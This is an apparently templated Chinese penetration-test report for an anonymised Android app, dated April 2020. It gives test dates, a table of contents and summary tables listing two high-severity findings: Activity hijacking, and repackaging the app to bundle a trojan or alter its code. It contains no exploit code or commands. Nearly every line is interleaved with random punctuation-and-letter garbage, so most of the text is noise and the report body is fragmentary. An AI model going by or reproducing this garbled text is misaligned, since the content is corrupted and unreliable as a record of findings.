" U8 T2 A0 V2 X1 O0 D1 @
, x$ c* F: m. }6 b! M( q" ^
$ s$ W( h8 B% u/ S" L7 ?( K4 ~% n5 r" \& ?" x
1 M6 Q ^; A; d+ f) x
; z5 \9 o2 |. W& d; W5 a
2 k$ u5 [& V6 s! B+ H
! A J& |: W" i" `% ?( t+ D' j # O2 |5 f! {8 {( b$ P
; b0 w. E) E: D Z- H Y* s/ B
0 h- Z; N2 V5 u7 x5 C: f
3 x/ a9 @" k/ y$ a6 t+ `
文档编号: - ^* W# i( K' Q8 G, {0 M
5 o+ D* c' ]" A
% m* c6 J, A* K
# L* M3 @1 z& j, z) O * S/ x$ X+ L9 ~/ d3 X
6 B8 T0 e8 i v( @ \. ^ $ Y& D! A4 s- w& B) ]8 U
8 Z$ d0 z' L2 B: ~' S
+ d% v6 A8 Y8 U# R n3 x. P
. Z! l2 Y$ {! z5 ?
. Y Z& z+ W' }. }% B: t1 |& U; e. q( \4 a, F. g" K
1 H0 ]/ C% g9 ]+ G$ B- Y) C; l# ?: `& Z3 a+ Y& ]+ f7 X8 B' R
( |8 l6 z# d; c: _% g3 R" q2 l2 E
1 d5 {# @3 A s- b' h9 B1 Y
2 t6 X6 M9 w. p: w8 L" y) J 1 r g# i% z; b$ A* z$ y
$ P% v- x/ V) r" `
2 {) Y o2 K7 F6 p
3 ?5 M1 |1 j2 ?' k3 U) u- j+ M ) A! R# E5 b$ {* N
5 _, g7 V$ _8 I* v, q" ^$ R
# ^# j [# \8 ^3 L) s% k/ `
1 E8 [5 [' Z. R4 L- H% \- z+ t
1 b! K5 {9 w3 N; E9 e# K. s9 A; x2 s" M6 H" M7 v
( } a5 G3 U6 i, ?7 ~
5 d6 d7 N+ U1 Q
! |) m. C9 Y4 m$ c/ A/ l
. h* D! I; k0 ~& {; w: E
* t" O# d% m* J. M* P
& n9 j( J: B+ d; u
, J6 ^! }& T' E2 _0 g. j0 n# @5 D$ p
某某某APP渗透测试 ( U9 i+ c( X/ F3 a' C& ]
$ p: z; V3 h- w" w6 O' E. j
" H! T! x5 `- q9 U$ w( U( d9 [
2 I, Q3 }: Z6 B- f, q( S Q0 P8 v5 k- I: x8 t9 q! h
9 J! i6 k3 s' Z* F8 \! V2 q+ v
( L: P9 a4 ]) ?9 E. a, x
/ r, `; V- _. z, p3 m) j
1 e: _$ U' V" F" O- D5 \$ @1 l4 ~
( _ p' L3 \! `" E2 _4 t$ x
1 H' Y3 ]& L) s" m/ T* p+ @7 E# d( |1 z, C1 k$ w
& E; u$ ^; \2 H# A" C! M9 R
. U y. o- z H. i \
$ q% F% o3 c1 `5 w; ?+ W$ o
5 B! \7 Y& J( D5 Y
% G$ \% u t5 o4 y* q/ S' I' D. l! d0 u. ^1 j+ j
* y2 `( h, W" Q: k
6 f' V3 S; t7 d9 j+ H
( Y$ y; U! q8 P; w8 |
2 b2 ^4 U$ N8 h3 ?8 a0 j
7 [2 f7 U7 E/ N" f, k. Q1 x+ A$ F. |6 k; W3 I* N, ]
1 n+ a3 C+ @8 b$ u& f/ w1 @- l7 C0 q
% k0 S1 @9 |3 c# D+ w+ ?
. @5 g. |' o# L$ H# m0 C % S# H n5 m0 r- ?
: a; F v! @" V& V% Y% S 技 术 报 告
+ H: N5 {8 S# C4 N/ T; u
% I( c1 A& l2 b$ k, m% Y
6 t7 ^- j! O. ~" O2 r" h3 W4 k: t6 k. ], l% N
, `. t. \4 }+ I8 b
q$ }' k3 a6 I7 c; O " c) K0 f& ^# u8 m9 d% d% [
, Z: K( y4 k5 e# E
+ U/ ~" s5 N) S! _$ ?' K9 d' M
! ~8 g$ G+ j2 n
0 u4 T% d2 j+ _' M% E4 U N: n, E0 x; H! W2 _
. }& Q+ O6 I6 f Q
8 a" x5 R# ~5 r4 S
! \ {3 \6 X1 E( B& P4 Z
; r# A& F' F: B o$ I. y K
! e: Q$ R# G! w2 @+ T
6 i$ Z. [7 b0 o7 R7 Q0 a! R 8 W; [# _1 M# a; o! R
. O8 t8 I. Q- Z! b7 k4 m5 z
) N. a$ @5 O) K- i6 _3 `+ r
, V: ~2 }/ I2 H$ p( l6 L
! p5 y9 T7 y2 D8 ~9 |
' J) Y4 D. ?. X/ a9 K$ _ ! A. @+ K3 G: h
. m: ?7 F6 Y: R% h
2 |. v: I5 U, B! W3 U
% x# P0 b9 e( S
* t6 Q& n1 ~, ?! e. e7 T5 w1 ]$ z" O/ m0 u6 K/ Y& t
' d/ B1 O. n/ |# I w' o
9 t# y9 U& e5 _5 m& v0 K m
- w1 E' @8 `; \4 S" m
% \& J f! H! X' K4 @
$ s' y& U/ A/ I k2 `2 c3 }7 E6 s1 Q9 H- p3 {/ w! q
9 m: i6 S" H) z' _
f2 Z% q) k5 [2 ~: G% }
; V/ l" \0 y5 E( B, ?6 y+ ?
5 r: O1 U3 s) [* h
' |* g u# A; R* v, O; \ h
& ^& w. v g. p6 E- @. d
' F/ Z( U V7 i, V7 K" x
. J2 `! d& o# z) Z. b1 D g
( h$ P; O' Z7 u; r( r1 L2 o$ K5 j# f/ e1 z+ A: ~
# B0 m$ w7 G% w# x1 J: I; h" g# z. {! W4 w
* G# f; g, U8 h; }! j
5 U' U% B) T& A; G9 h. r! E3 K
8 m) m( E/ j0 |; B
( {& B' [, s6 H; O4 C
) }2 X' |( t8 I/ R* L5 }6 i6 I. y1 Z) O$ I6 O
3 U- D; M2 m5 Q
; z+ W( k, e4 R
' f8 C8 K! Q3 i& s
# S& E9 @; o4 f' q( Z8 ^- c
" U, w. U* x8 d' e
3 E- F- n" r, [6 R0 z
" W4 L7 v; c5 _8 B; y& l$ ?. W% r
2 O4 M4 |& F( q+ Z9 R. T( _
! u7 I) V7 q8 X0 ]- X. T5 l: j. l& q; F0 I
6 v, l [2 H+ n* u% X2 x% I( b
$ l5 J( R2 ?6 V
0 N% V, i2 P9 _! F( @: u; n5 \. j$ Y3 G( D1 @
; C7 _$ \3 m1 P0 C4 a. |/ @4 A! e! M
( @8 I3 @" @4 R4 d4 d
n9 G* ?: }$ P, }
( ~, H$ P: D4 P [: K- b. }$ p8 l* c. `6 F) X0 n
5 ^! p5 Y' A" j
4 V% q \( A$ W
: V/ o. R) m' s3 t7 x
4 _$ a8 z: o3 u$ G
2 W0 B! z/ J }4 c% ?5 d
% q+ H; V6 W, S6 q
4 R! q$ J" G' c# x, v( j1 w
; c' i. a' f( g8 J, H+ C 1 g& u4 a8 w6 y4 i2 Q( M3 J( g
# m% u+ {7 P ?# A* }- ^4 \* a" ~2 {
9 E* p/ {9 Y% V8 U$ @5 T4 R: Y% K' z; _+ ` i6 M# d
2 A1 r' i5 Y2 Q' d5 p0 U+ ^2 A# I+ o4 z1 {
* K* m9 r8 A2 M( _+ d
: m' i& E' n, E: O$ `9 }
9 g. ~4 a9 ~! |) [4 @( y' h2 @% P+ p3 \9 X
0 ~: p4 n7 b$ s r: n+ Z
2 g( X2 Z/ z! } p, q6 n! |
- @/ |! u* q( ?. T: j
* w" U7 A3 K8 @
- U1 Q' i* W. ^! w/ q5 O& d! T* [0 K" {
: t& h3 b; d- i8 f% t6 k) T+ [
6 I6 p! `& g& |+ Z. p5 R0 T& _9 g
# g* y, @4 f' i$ N% H, b9 d2 q
) R9 ~: @+ x/ N8 J, L- S 6 z$ w# Z4 ~* X/ G. ~9 O1 ~
\; \* y1 P; p6 s& B
9 y Y) a% g9 B) w
2 B2 h- ?/ G5 H3 T 1 R; E; m, d" ]* p K
2 }" q0 b% N o ) @- v& v, G) K- V- J
7 p% v- q" i8 w+ x& u- h8 ~
. C$ N# {5 W, t( Q. A- b f6 ^! r. R- s. b0 f1 |
3 k }6 a- H7 y2 J C) ?- j7 N) y; A0 f. Z8 y- p/ ~/ Q
二〇二〇年 $ z: y8 D7 @4 l$ E7 ? {/ F0 U% L
) s P( j$ j- W2 _7 W, j
. C! d! K0 J* h; n4 S, Y8 B1 c* _- Q( N. F# \% u& [: L
$ E9 U+ w0 N' M, O
: T2 j M) p) _0 \
/ P0 A' R* h% e; L" V3 E
" p3 M4 u) u0 K i+ j* q4 M # W9 O. V) |. ~% z" T* ?
, [" c; j' C# S6 o7 H" q
3 r/ T" V. \3 s6 u
2 O; ?# u8 Z% Z# `* ~
5 B( _6 }2 R/ n2 T6 A5 V" n3 _# d* t, {
8 S* ^- y* m& t% q5 c1 w
- |. u; V# \: c" F
' |1 v! e! w" Z U6 E0 Y/ h Z5 z* G
9 F1 D7 S: m2 a
- [$ V, C* M' D# x& o 4 N, m% H1 q% k# F2 q
3 T2 u- J; ^8 g( i# T
目 录 8 w* J7 D# p) H9 r1 Q) V) h1 M3 J
' q3 B+ K6 ~9 l' S# J" k( s
' ^3 J9 S3 h' K) E, |8 c1 }- t1 K6 c/ z2 |) e* O
# y) Y- n, I/ H7 Q
! i4 {; R3 ]( A9 s& s
) q+ m& N6 e4 t3 i: Y {4 m: F' U& |; s( B5 X& P
7 g1 ^! S# {+ c0 K/ A: X6 [/ p
# v t% H$ j4 N' A% _- E6 r3 z a
' L1 e* ?& h2 @2 R& ]8 h' r* W+ U
. i% [$ h4 B( L0 Q$ D6 Q
5 z: W$ _8 B) N H5 E" l- \- f; ^* k; G; M' d8 C3 i; |
1 概述... 3
( ]1 e2 {( H' c! A z0 v' Z' y4 _) C& _/ J" }: x5 S$ p/ `/ V
( X( Z7 N. M! l- p+ E6 E
6 Q+ _; M/ y1 `* ~: K : n) s8 i% R8 x& M1 d3 q$ x7 p6 v) L
) _, F. U% [: P! X7 p
1.2测试时间... 3
# Y* ^0 D7 |) p' }$ T
2 Q' c. y/ ~, i, M' K5 z; v
5 N: v* Z# r- W1 ^* ^
5 Z) K8 L* Z6 {3 a" r- X0 p" O8 J
# y" F$ C! _ y
1 B" V5 w; A2 X6 c 1.3测试对象... 3 / I+ X8 n" m$ o r
" z6 {# f9 \: E5 U y
2 w: K/ j. z- L, L) E- ^3 v
+ f" d8 H: K( D
. ^# G" S3 g" x3 Q! J# F+ J; y% X
5 U e; s# y5 a$ }
1.4测试结果... 3
, W1 W, x6 n) z) \4 _4 a: V# d# c/ @4 p9 W& ]5 I+ m
}0 ]; }/ S* T) d* F% y- {& b7 m
; e6 W$ |, @* u! D2 [ ) {# G3 Y) d$ p/ I
8 [: S p8 a1 ^* t4 E" e, M 2 检测结果... 4
8 t6 ~8 w: ]1 B. F4 R! q% X4 [+ S8 v9 D$ R$ X* K0 u- n
" F% j- ^) h) @5 t+ _$ n4 ~% D
! D' V1 f8 y5 r8 M2 J* c! V( J/ c: U7 O
2.1 某某某... 4
0 j. `7 t* l+ d
, W# y! p* O3 v" `! J: P
7 d; s/ L* K# ~9 P8 o
6 @! |/ C ` D! U* p& G ' N5 h# I9 q. k4 t5 j1 G' l8 R4 J
9 b* ?% ^9 s+ U2 A: t' x
2.1.1检测目标... 4
3 _$ C+ Y5 |; D. m" c0 d6 b2 s; n$ v4 L0 Z2 G/ ?5 H5 ^
+ o' ^7 P" ?' {! h
1 N" R, `4 I! f, d% k* l& P5 F. {" [
u1 `- f5 |2 I( O8 V, k/ A+ m% h) c
2.1.2检测结果... 4 1 X8 o9 z$ f+ P) g
* q {( u8 u# A. c% R
5 q0 M0 U" {3 y8 k( s: f. [4 v1 Z3 X, N/ b6 G3 I* g2 x& d! Z( D. x& ]
- h! O& r9 q( A8 ?+ ]6 {6 L3 [" E
3 D- O6 G5 O3 \ 2.1.2.1. 4
5 G, Y) |: C. r* q' l8 d) \
( w" `& U% L% n: V, O. f: S, E t( ^
% _! p+ s8 W# {# q
" k, ?5 d6 W3 g
: J6 B8 M7 H4 L: \0 A1 k
/ c0 R* {" i1 D 2.1.2.2. 6 2 \8 h# I' \% C3 t
# z# N# n4 `" y. W+ N6 l7 o
6 D1 ~* G. \8 C# P' `) L) [
& F" s, L- u9 A
/ j5 J! c% [' K( ? I; w3 ]- X% ^
: ^. b* A- ]9 t) v
# W4 E! r) G! h+ D& h
% s" |5 T' ~& ^3 }
; j. f9 e1 n; U: l/ }" J4 d4 I# [; W6 I/ Z& u, ~4 W. }
+ \# k% T: l% i5 S6 l; t
{1 u( U+ E% C. l
" [& a: A3 D I( |' \$ I; A/ X4 a& ^
: ]) Q i( M) @! ?. p A) T
z% I' Z, f: A- D2 l: E6 i
% M, `* ]& L, O+ e, u9 S& L6 B
J8 N7 X$ D' K8 ]1 |! V
. L @4 D& N( v9 J" C A
5 X8 T( L* k, R8 f2 T. I/ A% B* Q+ r7 M3 H8 X6 @. o% T. ]
1 概述
% F G5 G3 _' U% q% ~
3 P; f! B1 `1 M
: I5 q8 ~& s( |3 p
- l Z# k/ q/ H$ u9 S
$ U1 J% e; s, ~: g* N+ y2 N# e( j2 A1 v0 `
1.2测试时间 3 S f8 |9 v+ i! }+ b) }
3 M* e" U# @" \1 i
" R0 u3 t' a4 s0 w
E: t2 T# F+ ]. q
( u5 p# V$ j. J k! B( `1 M, q1 V* i0 `0 t1 c% x
9 i: K7 @% Y2 z3 w- r/ N4 v
: ^2 Y8 Y% H, p. j
0 t0 M, B2 b7 s) Q% W# n/ m2 q
; z' Y" w+ b1 G0 O9 Q: [4 J2 a% t
0 R% {/ C( t& _ _" o3 f( o
2 N7 e1 R1 H }3 U + \ z. c6 r( E# O }
6 U% V+ l" m2 e1 [ 渗透测试时间
5 s* e! b4 k8 F- H: W1 D K6 e0 O, `4 [! o
0 n7 o/ U3 _' X% z; n) |) ^- l
# r& v# O {( t0 I# F3 ? |
' H: R- l4 c# L' {& |2 G/ | O, f% M, r5 W% I& K# X
9 d' W9 k( I- J* u3 c
* ]- X J% F) Q, f" E * p: T6 }# O: c
f1 p/ S L; z% U
; d9 e7 }. V5 N0 v' }8 w! u
' q* t3 p5 m% V# l
: J( B' \* s% H0 \2 ?4 P
, q4 {) A; u1 C 起始时间
# i2 }7 k' u3 M+ V+ F1 I
6 b/ S2 m' y9 v" ?# j5 y 8 `2 t# U5 X* s' s; v6 a2 m
4 Z& @: a6 b; x& I3 l; S5 F
|
- Z) q# Q _8 W4 g x2 t3 y
: @8 N0 h/ j) { h
6 O' F: }, ]% j% |" V! {4 p. H( B% B* C9 n; ]# J
1 a5 H: }6 I t p
' w- j$ N. N1 t7 j3 _ 2020年4月6日
7 b! v! Z: n* @" V1 M u& T
: `9 c; \. v# X% u
6 V& t3 e: t) `4 [0 k1 G
! ?' X$ [: p: u- X; J3 K" [, K x# x | & Z* G) v4 I) B' P9 w
3 a3 ?# k! |# U0 A7 @' ?! b
2 ?8 H& Y# \- ^
6 n$ A) f$ |7 c" G( {# V+ o& | 9 Y. {, i& ~- b" O8 [% ]& c
# T& s7 _5 Q# \% T5 b; S
6 B8 S2 g8 V2 X- Y* L+ l
; {" f/ s* ^+ e% P0 x) z5 |, `# x
3 _0 R |0 |4 [( y1 e+ @0 Z% [% [- o
结束时间
1 z" W# q0 s- n+ b. _$ m# X* B" G* o
L z3 e: x: s ~
) A! c* i2 N1 ` V* w3 ^1 |! P: m
| # G: L$ X1 Q# I4 }
# ~6 ^2 H( [, S' X) P ' v5 s9 Q9 R! a6 \
7 u8 f# r0 {: J8 z
% Q3 v) Y* ]7 r2 j7 b0 U
, |6 L: }* n* R& W 2020年4月9日 3 S2 g8 N, p9 [; _% v1 R
$ } T5 d% l, {) b& a! g7 k' f
! V* B# M% C# J9 L( W6 n* f
4 |, a8 Q" z( n. m0 _' ? | 2 z8 w2 l7 Y, t8 F
+ o4 @2 ]3 b- N+ E' U. J+ ~
; R0 ]" x$ d+ ]8 O1 C9 M6 P
! w& z9 m2 h. W7 x7 S: ^ + I/ r2 M4 v" q* T, ?/ U
8 U% S d e$ U( |: i, L
4 q1 f) ^7 j3 n0 W/ j$ |3 i. t7 d. @) Z, R
' t/ X: A6 N0 T+ C' j
4 T: ]8 T2 B8 v4 @ ]
1.3测试对象
, ]: W# `3 W* A% l1 d
3 u+ F& I& ^, t1 L
) ^- i4 Z4 Z3 V4 [3 D; f
, o% A8 F" j8 \# `- r/ C! D3 [( o. j 4 Q& d' S8 q) H
# z0 g- L- U9 l 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
# ^& q! {6 }( j$ V& G7 {& Q3 a1 H. W. C; @8 F0 A- Z
) d' K: y; {* W5 d& X/ E8 p4 S5 L
- f2 i( d* O; Z2 T & d# M0 G/ `( F+ u+ R
4 K* e, F- m" d1 u( E5 a3 P8 r* k- o
表1-1 检测对象 / J h( e* d) D2 w6 n& \$ @
: ~5 L0 B2 |8 |6 Y
3 S' N, n- k4 r3 ^! ?* c
/ w+ T+ `6 e% S5 M: _
2 V+ e0 e3 }0 |! {9 X
: b# w; m( X$ B6 J# z, q0 n / Y$ J# S& H) h6 o3 m* S3 K2 ]4 |/ T
! P9 j. G& ^8 ^9 P
. o, r0 D1 A* B0 b2 ~& E, L8 C9 r# Y8 E( S
5 y) W7 |! g8 C& |: s% ?; s2 q- c2 t, y8 E5 L0 P% b; m: e7 c
3 ^, b/ b! a3 H
' e: G9 Y/ x) k 序号
! Z/ x; q1 S7 _; f6 O E% W% B6 \2 X0 q2 ?$ j r8 O1 W
5 L% ]. J$ F" G3 l1 |6 A4 S4 ^7 v9 F5 i, _; @. x- N2 w' m1 n
|
6 q$ e0 A, o' k* c) h; w. T& p0 ?5 j* M, F( v
: V3 g* C; u# U: |' A4 @/ ~) V
, b/ K& @( G) e: E( C* s ) a/ ]3 b" L2 l% R% G% |6 L* J
# d: c9 o& e; b- O2 i" {" y | 测试对象
- A; B f- |! _. U9 b
" |9 l- c: |/ P; \# X% A1 w
4 F: w0 f: q: D# ? O# e
3 Y6 ?' P# N- s* U; @9 c | 5 A* X' h) q% k5 O O& l
" Y! T! Y# D0 ] W9 b3 M( a- o) `
: [' N" e9 L* Q4 r& f% f# \3 ^3 y! ] n$ o
3 _* {6 W1 Q }* h! h
. Y# W% X6 l& l) n: c 测试地址
1 d }) \. j, d4 u4 n+ y8 I3 H9 H) l& f* d
: p" h$ \6 b6 d5 _% Q& U
3 N' H: ]- {' Q3 ~9 w | I2 @1 l( `" z& R7 n
) }* W( W: P( l: h; V& `
; p6 j) Z Y. D8 X8 Y; ]: V8 K1 z9 ] k
6 G6 L7 l2 a: L S7 F' q" b* h4 w* ~8 r& o2 ~ B# ]9 [
安全漏洞 ' S8 N( c2 }! k, Z
1 w( J4 f8 X3 F5 y
3 o H u- e( [8 @5 O
( B4 c- {: F. S: q" B( |8 T D/ G | # L5 e' r$ h1 h
" P" y5 s( i1 k" g! t) p
5 \ }- N: d1 O
/ e( R3 D6 I7 j
* {, N9 K, Y8 O* t% C5 q5 i, f3 k l8 W. K$ q0 U! ]
; R+ D# W2 u- M+ U- r/ A; l
3 k$ T$ O" w; f6 K, n
) ~% |' [0 A+ e b: x8 O) H/ H) J4 y
1
* F/ Y" s! l; x$ v' r ~' b! S1 s
% k/ y& u6 ~3 `/ w3 h/ R ; T: t, D& k1 r* f! b% V l1 C/ P
; R2 k9 d3 X$ l9 j8 g
| 0 W, F% w5 B! I% x! n
* x$ a& P4 c6 ]
3 U0 {: m3 B8 r, M- U8 |
8 I( Y6 R/ w6 j0 i0 z c4 f) O
% c/ V6 }! P/ O/ ~7 ~9 {% `6 i/ @8 X# K0 S3 F& m# H' @! N& k
某某某安卓APP ( B3 [& D1 C" ]8 r
$ M2 k: ~# O; i- y# P $ c- U: r3 ^8 S# o) a! r& _
# Z! _: a6 w0 i' S( c0 s; i
|
; {. {5 B8 v7 q7 M; Z: j
. J2 m! y5 R/ w' d
9 A! j1 B! g- M& \3 C8 o: Z% G; E' b" Y8 F9 K
. Z U, C/ b @+ G* N- d/ w
: D$ a; v9 V( x& r ~
! X! m* s' H/ r
" l2 N8 I8 O. ]7 R) G
+ E. |. c) d* y$ N
5 K# q' Q: ?. @; U) J: M; l. ~ | * l- T4 T$ @5 a! d$ c
0 C; u; G, k$ W5 I0 _0 A
9 ?2 m/ h5 R n% u" ~4 m* ?
( a. e6 P# K) T/ h o( h 3 p9 X2 X( _: }7 O
3 u7 O& i4 K( D4 J' w* r 2
* ~4 `! Y; T" `' s5 T) T* a0 G% ?% j& ~; s8 a* D/ G, N' L7 Q0 N
Q# m* ?; t% b7 H- x6 w$ R E, f; Z; r. l9 ^
|
: g" u/ U2 y s' c2 ^0 I1 p8 h3 |2 P9 r1 G4 [, E/ f
$ Z. e3 {" }/ R: p4 y
; B( P! _7 r: }: e " `( ^( Z+ ]9 E( h1 [6 D% g
. v, U4 |2 Q/ V! s& J
1 h- q8 D. @) O: T* v0 J' G2 P
7 m8 ~+ T- h: I5 i3 ~0 x6 v
: { l8 j( M" ]; _ V0 r3 L; j
+ z. U; {) q% U1 [; E: R8 J 1.4测试结果 1 x! ]2 b/ U3 e7 d# b# S: s
- u9 r( [1 q; M% i( S1 K6 m+ M
3 \7 V! K; @( X7 L4 G
- m" y+ q; M+ Y8 F- ~" D
/ s% D: {5 D0 s4 R6 i! Z9 a1 c, |# t. ~6 | k* `. W
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: " H# j2 Q+ r( o# \3 `* f
: f, D8 s: T' p4 Y. ]" C
( Z0 {, s- S- m( Q0 }/ k: G+ h+ Y
0 ?3 h7 s. V& M5 }& u3 \& \
3 }# z* z, I0 ~! }1 w- @5 J) F4 f V% I& K4 ~! \8 l% [3 U" X
( o; [* F2 l4 `% ~" W/ ~ Y6 D9 g
+ w9 n' ]. d- H/ `! j3 W8 [& N/ O
! ?( v1 v' w$ W8 t$ }# V) f4 k# J5 [
$ W- W7 Y4 b3 S/ k& x: T) q
+ T" Q( C/ U* H7 u" }3 i" X7 ?# B+ c, n) y! n& M
" r1 s( R/ v1 Q+ f$ B, C3 Y
4 E2 l7 R" q0 t5 _
( O$ j- @9 J4 ^& q6 s3 m" V9 R. f6 Y$ @9 o0 G4 S9 f) A
3 S+ ?) X0 M" t
7 p q9 G, o6 ^2 ]/ e* v: a
4 x4 j* G5 c- h3 C3 V0 K5 ]6 H1 I9 d: u
( q& k9 ^$ S* \( c( G , D% ~3 ~8 X+ v9 ~' F3 v
# J/ d b: v3 x2 w1 S, S- q
序号 ' U& a3 \3 @3 e- H j- \
' @* D" e' a5 q9 N% R) `
& Z. `* |7 T& u X- U- z5 B; V6 ], [ w4 \0 @+ T
| + J' ]9 p: {+ A9 b4 Y% |
. V8 \& A: W" m" h+ g, v
5 l' b* ] s/ v- y
4 }; E% m6 K& Z+ L0 J
/ |2 Z- M, A( _% m3 b
+ u0 y+ }' T( z5 E1 ~9 } 系统名称 5 C- K1 U) X! ^) X. D7 W
; z- e' a- m3 o0 |" ~. `9 w
$ o/ o2 `, Z5 ^; h# B
% h5 Z1 ]- q* \: }+ i O | 0 m9 B: w$ O; M, C$ a
, a/ T" T, V) p' d% b7 s, Z3 N. }
0 N6 _3 h7 M# \; d; W
# f0 f1 e- Y. m# q) j
6 E3 D) g. {( T$ m, t
) J3 ^8 {0 E. H) [4 V& ^4 a 漏洞名称
. D4 N' C, s* e+ \: [; e# D9 n% {2 v
0 K; O! i$ C1 m0 C2 C
, k! a/ M; o+ D8 `; f& D) ~ y' I& c
|
- g- v3 }% g N$ N$ _
6 G7 \5 \7 J3 O5 d/ y, g s" d % y. M% @6 M: q2 ?' k4 B
, K) q3 q. d/ L$ c! W
' S: X3 ~( l; E+ j' J" D# P
1 n& b' P9 F+ {! G" U/ ^ 漏洞危害
/ u8 G4 R8 q3 g$ R+ E2 [9 m8 F" p* G* s3 Y( T- m& y( U) O
# ?1 D' I5 T3 s
/ \3 C# `- \% S# T! d! H |
- J2 C; X9 p: O8 A" `# k& I) g- [1 j4 U0 |; S* |- X
5 ] n' E6 {# F2 U$ U
' ^+ J1 ]% u6 q( O : V5 D( l9 @8 {! A
$ _5 a( g' z1 h+ K. ]
修复结果
" Z3 H4 N) c1 `7 J5 E, o
# ]5 d$ @4 k$ f0 h5 p) V
& o8 c2 ^) K$ j: | P( @6 W. ~' X( B9 B: e' p, u4 h9 P4 S
| 1 A; V( Z8 i& k
g+ F; Z- G7 b6 `2 \
" t. e( t# L3 s$ N0 @1 K' F. N% C
* F8 M1 L) d1 _: Q& K& J
/ T4 b" e9 n. E1 c2 z, {$ D- k7 ~/ X/ @/ }; `5 O
/ f! _/ V2 z1 r( p/ P; T
! c" R0 O* s F6 I6 b/ @+ u; C( }& K ! c0 x1 c) }8 f* V, E0 y' z: K
# U% a/ t0 p+ K0 H 1 / U r/ V6 ^( M
! V1 h* s" [5 `
. i2 [- g) s' g/ O* ]: f
6 j! v5 L; b J | . G: i2 j+ I( X5 c
4 K8 P9 X9 o. h
) e9 |/ a. r1 s5 a% n7 H$ P
* a5 M9 k0 f4 E
/ d" ~) X; |' G# K+ h/ e5 Z
2 R! y0 W, U: J3 C1 x1 ]) u 某某某某某某APP
6 x4 V U; J$ u, r2 Z- h* ?+ p' |0 |( b# r$ _
\, q# x) z* M [8 ]! k) ]* N
' ~7 T( `3 Q! w+ J0 W |
; p9 i6 G3 V6 A8 K1 k9 m
+ v' n+ W6 Y2 h
+ p" _8 b9 U( a+ Q
* M+ U6 p1 M) Y+ s3 B " P, A* s4 M+ Y( X$ {/ @2 P
5 c- L( g0 a; T: Z0 N& B
Activity 劫持
' n0 S1 o( r2 {+ R) O) {, R; n
7 U x# X9 h/ `* P+ ]
0 Q1 |: p$ w+ _+ \3 q
1 b' T- C! ~$ ~' H# h: y8 H6 \# s 5 v; n& l& t' p4 ^* g
+ d/ N, ]( t2 u* h1 K7 S
3 d1 [3 f8 h [9 L8 u. Q2 ` K# h' |, h! B' `9 k
9 S% K& \2 a$ \1 U. E: \7 h2 G
# j$ u! }0 M+ ` | 0 M' f8 F8 |2 m. ^8 b' p6 _; T
0 P& ?2 n/ d, v* S; g
O7 i" Z% R3 i0 j: h5 E
6 M( ~: `3 |$ v9 x# Y % R1 d8 h6 C- }7 \- s) x: Q. r; H
: I: {- f; E7 @) ?' ~( N; @ 高 4 `1 S r- F( L
) o- p+ `; v% R2 Y# _/ y+ g
$ _# B* f) x6 n, E6 c/ T- ]/ \! K$ m
| . e. |$ [, w0 M2 T. U( ?; I
# _' }: g, a9 R* ]" `# f
* y3 R$ y5 c Z+ t& {
* X* e. u0 L8 S% a* h }
5 k' H& ~4 g! U, }' D* F/ E) Z2 |
' h( w- W3 G6 b2 D0 b1 z$ q2 B: [
+ @. Y; u) U; ? S$ ^7 s0 u
3 M% A: B+ H3 ^5 D( [0 ], `! {
6 e, c* U8 w$ O7 O, c4 t. v( E( A- N5 w8 U
| - g1 ^# D1 g h8 y
) l( p- ^! h% o' N5 B* w
1 r& e1 M2 z5 A8 c: N* E7 b& x8 [6 H- u1 h( h C0 e
" R1 z7 ^# p P" f4 f9 C; U* }9 ]' D, W2 p9 l3 `- |: U
; R) Y7 G! _' l6 ^' O0 m- K
% @$ p: Y- A2 v' [1 o # S/ @$ ]3 m7 L
1 K( |7 `+ { ~
2
% D) h( y- t; }7 h! o: E( }' b5 L
+ F" o2 \3 W3 R2 Y ) x. W) T1 l5 Y
8 J4 d4 s1 O4 i& t2 H0 q
| ) S, z* p+ x; o* L& s0 _ h, r; I
( [) B" f5 d. A$ O
4 y) m( k) r; l7 c8 t0 u: \
. ]2 n* g, t" F* [3 X& |
! k. ?% m, x1 }8 m7 J$ K# k* b+ f7 k# P: }) S. y( k9 M
某某某某某某APP
0 [- C* R+ N' x" v9 B
: G! B' R: y. \) f! B
1 G% {3 l* g' n8 S8 ]" G. ?; `8 |) e+ O' W- E9 B& |( F( T
| - ]3 d' Z' J) y1 K b7 _! K
9 n- `+ B) p% |3 ~5 i$ v% p' l
: i5 }1 o& @/ T" T) R; I! ~) X5 H2 d, y8 R X
. D7 |: N1 N! Y" {
! |& F8 z' ?+ ~4 t; Z 反编译二次打包捆绑木马、篡改APP代码 , b) Y4 n& [1 N. L/ _+ f: e
' M9 h0 l* Y6 c# E: r/ ~
, Q# L- y8 p- q7 o% j
' W \* @& n. e7 z& D7 W. ^- V
|
, ^! ]$ `8 P+ x/ ^6 g" ^; Z) H5 s# L& H4 I w8 x9 ^3 T. t
" [' o$ g/ G2 Z: F0 U1 s8 b7 e8 O/ f# i0 k3 A, S! E2 T$ h: q1 \3 z
" `# J" A2 y5 w$ d9 X D$ P1 C
( O+ ] E. w% q
高
' v) l+ n) U) b0 S9 A% h8 o- L2 s+ g7 k7 f) V* a* @/ q
) N8 O! i m* g! t3 S; `: l* s# ]7 J* N+ m" N3 x# U
| 2 e% J. M) v1 A( J) S
; d' b: t3 b( }7 G
8 U; t9 ]2 t. e5 B0 [* A- P/ W
- z5 }; u) `* ?9 I" n! R. ^
6 |5 w9 H( t' q: ?+ }
( b6 J1 j5 ~5 H * a1 v, H0 B# `3 X$ n9 T4 [ E2 p4 p
/ V6 U% e# X4 \7 D
3 `# W4 R1 J' D/ n! W: \$ X; S, Y$ X. n
|
9 Y6 {; t2 o6 ?1 J0 v7 [: b z: y" d" p* w
$ x$ f6 v. E% s% { I9 ~) g9 y
% Z3 u4 z% v1 ? H) ]+ r8 x
4 z9 Q, v+ Z3 k
' }& Z2 M! e1 w" B
: ?( s- E4 U9 E6 E3 \# S9 m+ E
0 |- P" C& S2 O+ [1 X8 P) v0 D- G
+ \0 S. o( o, H0 L. X, o6 ^/ J
3 `( r" j, m$ v; X! ?7 u/ T + c! p' J. a) k4 c8 J6 w+ w# q: R
+ T C/ T( r# Z* N* p, v/ ~
# S) F8 K% H, K# J& p- o g( g8 V, E1 p: ]
, G' X( j) ^8 T; g% k
% n( D# Y, f$ V, }# L7 A5 k0 |( p' j 4 U& w3 S5 ^3 J! G0 v4 }
, L5 K3 a G6 r3 v. K0 {( \ 表1-2 测试结果
